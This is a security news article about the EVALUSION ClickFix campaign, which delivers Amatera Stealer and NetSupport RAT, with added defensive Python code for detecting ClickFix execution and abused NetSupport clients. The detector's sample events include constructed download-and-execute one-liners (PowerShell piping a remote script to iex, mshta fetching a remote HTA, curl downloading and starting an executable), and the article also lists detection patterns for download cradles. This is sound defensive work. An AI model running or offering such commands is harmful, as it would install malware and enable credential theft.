A recently uncovered malware campaign has leveraged the increasingly popular ClickFix social engineering technique to deliver two malicious payloads—Amatera Stealer and NetSupport Remote Access Trojan (RAT). The activity, observed by threat intelligence firm eSentire, has been attributed to a threat cluster dubbed “EVALUSION.”
The campaign points to ongoing innovation among threat actors repurposing legitimate IT tools and evolving malware loaders. Notably, Amatera is believed to be a technically advanced successor of the ACR Stealer family, also known as AcridRain, popularized among cybercriminals in 2023–2024.
Attackers Exploit ClickFix Deception in Targeted Malware Campaign
ClickFix is not a product and not a Microsoft tool. It is a social engineering technique: a lure page, typically a fake CAPTCHA, a bogus browser or document error, or a "click here to fix it" prompt, tells the victim that something is broken and that the remedy is to copy a command and paste it into the Windows Run dialog or a terminal. The page has already placed that command on the clipboard. Because the victim executes it by hand, there is no download prompt, attachment or installer for security controls or user skepticism to catch.
How the ClickFix Tactic Works
There is no malicious installer to scan. In the EVALUSION campaign the victim, following the lure's instructions, pastes and runs a one-line command that fetches the first stage from attacker-controlled infrastructure. That stage kicks off a multi-stage infection chain that ends with the payloads described below.
Key characteristics of the campaign include:
- A lure that instructs the victim to run a command rather than download a file, so no attachment or installer ever crosses an e-mail or download filter
- Delivery of Amatera Stealer and NetSupport RAT through multi-stage payload execution
- Obfuscation layers using batch scripts and compressed file formats
The familiar "something went wrong, here is the fix" framing creates a false sense of legitimacy and turns the victim into a willing participant in running the first stage.
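The execution pattern above has a recognisable shape in process telemetry: a script host launched from explorer.exe (the Run dialog) or a terminal, with a command line that fetches something over HTTP and pipes it into an interpreter, often with a "not a robot" comment tacked on. The following is an added example, not code from eSentire's report or from the page; it scores constructed Sysmon/4688-style events for that shape. The indicator list, the weights and the threshold are tuning assumptions, and the sample events are made up.

```python
"""Flag process-creation events that match the ClickFix execution pattern.

Constructed example: the events below are made-up Sysmon/4688-style records,
not telemetry from the EVALUSION campaign.
"""
import re
from dataclasses import dataclass

# Script hosts a ClickFix lure tells the victim to launch from the Run dialog.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Parents that imply a human typed or pasted the command.
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "conhost.exe"}

# (pattern, weight, label): traits of the pasted one-liner.
# Weights are a tuning assumption, not values from any report.
INDICATORS = [
    (r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget|bitsadmin)\b",
     2, "download cradle"),
    (r"\|\s*(?:iex|invoke-expression)\b", 3, "pipe to Invoke-Expression"),
    (r"(?:^|\s)-(?:w(?:indowstyle)?\s+h(?:idden)?|nop(?:rofile)?)\b", 1, "hidden window / no profile"),
    (r"(?:^|\s)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2, "base64-encoded command"),
    (r"\bmshta(?:\.exe)?\s+https?://", 3, "mshta fetching a remote HTA"),
    (r"https?://\S+", 1, "URL in command line"),
    (r"\b(?:robot|captcha|verification|human)\b", 2, "CAPTCHA-style comment appended to command"),
]


@dataclass
class Finding:
    score: int
    reasons: list
    event: dict


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event, threshold=4):
    """Return a Finding if the event looks like a ClickFix execution, else None."""
    child = basename(event["image"])
    if child not in SCRIPT_HOSTS:
        return None
    parent = basename(event["parent_image"])
    cmd = event.get("command_line", "")
    score, reasons = 0, []
    if parent in INTERACTIVE_PARENTS:
        score += 2
        reasons.append(f"{child} spawned by {parent} (Run dialog or terminal)")
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, cmd, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return Finding(score, reasons, event) if score >= threshold else None


def scan(events, threshold=4):
    """Score every event and return the hits, highest score first."""
    hits = [f for f in (score_event(e, threshold) for e in events) if f]
    return sorted(hits, key=lambda f: -f.score)


# Constructed sample events (hostnames use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "irm https://example.invalid/v.txt | iex" '
                     '# I am not a robot - reCAPTCHA Verification ID: 7811'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta https://example.invalid/verify.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell"},                      # benign: user opened a shell
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"cmd /c curl -s https://example.invalid/up.exe -o %TEMP%\up.exe && start %TEMP%\up.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit.score, basename(hit.event["image"]), "|", "; ".join(hit.reasons))
```

The scheduled-task PowerShell run and the bare interactive shell stay below the threshold; the three pasted one-liners are flagged with the reasons attached, which is what an analyst needs in the alert rather than a bare match.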
Dual Payload Strategy: Amatera and NetSupport RAT
The campaign can deliver either Amatera Stealer or NetSupport RAT; which one lands depends on conditions the chain evaluates on the host after the first stage runs. Each payload serves a distinct objective.
Amatera Stealer is a relatively new infostealer, first documented in June 2025. Its code points to a direct lineage from the earlier ACR (AcridRain) Stealer family. The malware is designed to:
- Harvest credentials saved by browsers
- Exfiltrate session cookies and clipboard data
- Target cryptocurrency wallet data and authentication tokens
NetSupport RAT, on the other hand, is NetSupport Manager, a legitimate commercial remote-administration product, deployed with an attacker-supplied configuration (the client's client32.ini) that points the client at attacker-controlled infrastructure. The binary is the vendor's own, unmodified software, so it draws less suspicion than a purpose-built backdoor. Deployed this way it gives attackers persistent control of the victim's machine and lets them:
- Disable security controls
- Download additional malware modules
- Provide surveillance and lateral movement across enterprise networks
The use of these two payloads offers flexibility depending on the attacker’s goals—data theft or long-term device control.
Attribution and Ongoing Monitoring by eSentire
eSentire analysts tracking this activity under the name EVALUSION believe the campaign is still active. The actor consistently relies on lures that impersonate trusted prompts and well-known utilities for initial access, in line with the broader shift toward deception rather than exploits as the first step in.
The fact that Amatera Stealer likely evolved directly from ACR Stealer suggests a continued development lifecycle. AcridRain was known among underground criminal forums as a cost-effective, low-detection infostealer in its prime. Amatera improves upon it with enhanced encryption, increased targeting of modern browser ecosystems, and upgraded exfiltration techniques.
“The reuse and evolution of AcridRain into Amatera reflects how threat actors iterate on known malware families to stay ahead of detection,” one researcher summarized in eSentire’s analysis.
Defense Recommendations for Enterprise Protective Posture
As ClickFix-style lures continue to spread, organizations should expect a variety of social engineering prompts that impersonate enterprise software, browser errors and verification pages.
Defensive strategies include:
- Application control (AppLocker or WDAC) together with restrictions on the script hosts a pasted one-liner relies on, such as mshta.exe, wscript.exe and cscript.exe; where users have no need for the Run dialog, removing it by Group Policy closes the most common ClickFix entry point
- Behavioral monitoring for PowerShell, cmd.exe or mshta.exe spawned from explorer.exe (the Run dialog) or a terminal with a download-and-execute command line, and for installer utilities creating unexpected child processes
- Endpoint Detection and Response (EDR) rules that flag NetSupport client binaries running from user-writable paths or configured with a non-corporate gateway, and generic infostealer behavior such as bulk reads of browser credential and cookie stores
- Employee education around fake CAPTCHA and "fix it" prompts (no legitimate site or support tool asks a user to paste a command into the Run dialog) and around the signs of a compromise after the fact
Security teams should also routinely audit software supply chains and user privileges to limit the blast radius of a remote access trojan or credential-harvesting malware that does get through. An infostealer running as a standard user can still read that user's browser data, so saved browser credentials and long-lived session cookies deserve the same scrutiny as passwords.
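Because the NetSupport client is genuine software, detecting its abuse (as described in the payload section above and in the EDR recommendation) is a matter of context rather than signatures: where the binary lives and what its client32.ini tells it to do. The following is an added example, not code from eSentire or from the page, that triages a deployment on those two axes. The sanctioned install directories and internal address ranges are assumptions to be replaced with your own, and the client32.ini key names used (GatewayAddress, Quiet, SysTray, SKMode, Silent) follow the commonly documented layout and should be checked against a known-good config from your version; the paths and INI text are constructed.

```python
"""Triage a NetSupport Manager client deployment for RAT-style abuse.

Constructed example: paths and INI text below are made up. Key names are an
assumption about the client32.ini layout; confirm against a known-good file.
"""
import configparser
import ipaddress

# Assumed: where an admin-sanctioned NetSupport client is installed (lower-case).
TRUSTED_INSTALL_DIRS = (r"c:\program files\netsupport",
                        r"c:\program files (x86)\netsupport")

# Assumed: the organisation's own address space. A gateway outside it means the
# client reports to somebody else's NetSupport gateway.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# [Client] settings that hide the client from the logged-on user. A helpdesk
# deployment normally leaves the tray icon visible.
STEALTH_SETTINGS = {"quiet": "1", "silent": "1", "systray": "0", "skmode": "1"}


def parse_ini(text):
    """Parse client32.ini text into {section_lower: {key_lower: value}}."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return {s.lower(): {k.lower(): v.strip() for k, v in cp.items(s)}
            for s in cp.sections()}


def gateway_is_external(gateway):
    """True if a 'host:port' gateway (assumed IPv4 or hostname) is outside INTERNAL_NETS."""
    host = gateway.rsplit(":", 1)[0]
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True            # a hostname: treat as external unless explicitly allow-listed
    return not any(addr in net for net in INTERNAL_NETS)


def triage(exe_path, ini_text):
    """Return a list of findings for one client; an empty list means nothing stood out."""
    findings = []
    if not exe_path.lower().startswith(TRUSTED_INSTALL_DIRS):
        findings.append(f"client binary outside sanctioned install dir: {exe_path}")
    cfg = parse_ini(ini_text)
    gateway = cfg.get("http", {}).get("gatewayaddress")
    if gateway and gateway_is_external(gateway):
        findings.append(f"gateway outside internal ranges: {gateway}")
    client = cfg.get("client", {})
    stealth = [f"{key}={client[key]}" for key, bad in STEALTH_SETTINGS.items()
               if client.get(key) == bad]
    if stealth:
        findings.append("user-hiding settings: " + ", ".join(stealth))
    return findings


# Constructed: what a RAT-style drop into the user's profile might look like.
SUSPICIOUS_INI = """\
[Client]
_present=1
Quiet=1
SysTray=0
SKMode=1
Silent=1
[HTTP]
CMPI=60
GatewayAddress=203.0.113.10:443
Port=443
"""

# Constructed: an admin-installed client reporting to an internal gateway.
SANCTIONED_INI = """\
[Client]
Quiet=0
SysTray=1
[HTTP]
GatewayAddress=10.20.30.40:443
Port=443
"""

if __name__ == "__main__":
    for path, ini in ((r"C:\Users\alice\AppData\Roaming\nsm\client32.exe", SUSPICIOUS_INI),
                      (r"C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe", SANCTIONED_INI)):
        print(path, "->", triage(path, ini) or "no findings")
```

Any one finding is worth a look; all three together (user-profile path, external gateway, hidden from the user) is the profile of a client somebody other than your helpdesk installed.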
The Broader Implications of ClickFix Abuse in Malware Campaigns
The EVALUSION campaign is a case study in how low-complexity deception yields high-impact results. By borrowing the look of a routine error or verification prompt, cybercriminals raise infection rates with minimal development overhead and without an exploit.
The evolving threat landscape, as demonstrated by campaigns such as this, underscores the need for security teams to continually adapt detection methods. Rather than relying solely on static signatures, detection must key on behavior (script hosts launched from the Run dialog, legitimate remote-access software appearing where it was never installed) and recognize code reuse from older families such as AcridRain.
With Amatera gaining traction and NetSupport RAT perennially abused, the cybersecurity community should expect continued abuse of legitimate software and legitimate-looking prompts in the malware distribution pipeline.